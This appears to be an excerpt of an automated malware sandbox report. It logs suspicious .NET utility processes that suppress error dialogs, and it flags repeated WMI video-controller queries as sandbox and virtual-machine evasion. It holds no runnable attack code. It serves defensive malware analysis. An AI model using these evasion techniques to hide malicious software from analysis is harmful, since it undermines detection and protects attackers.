Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
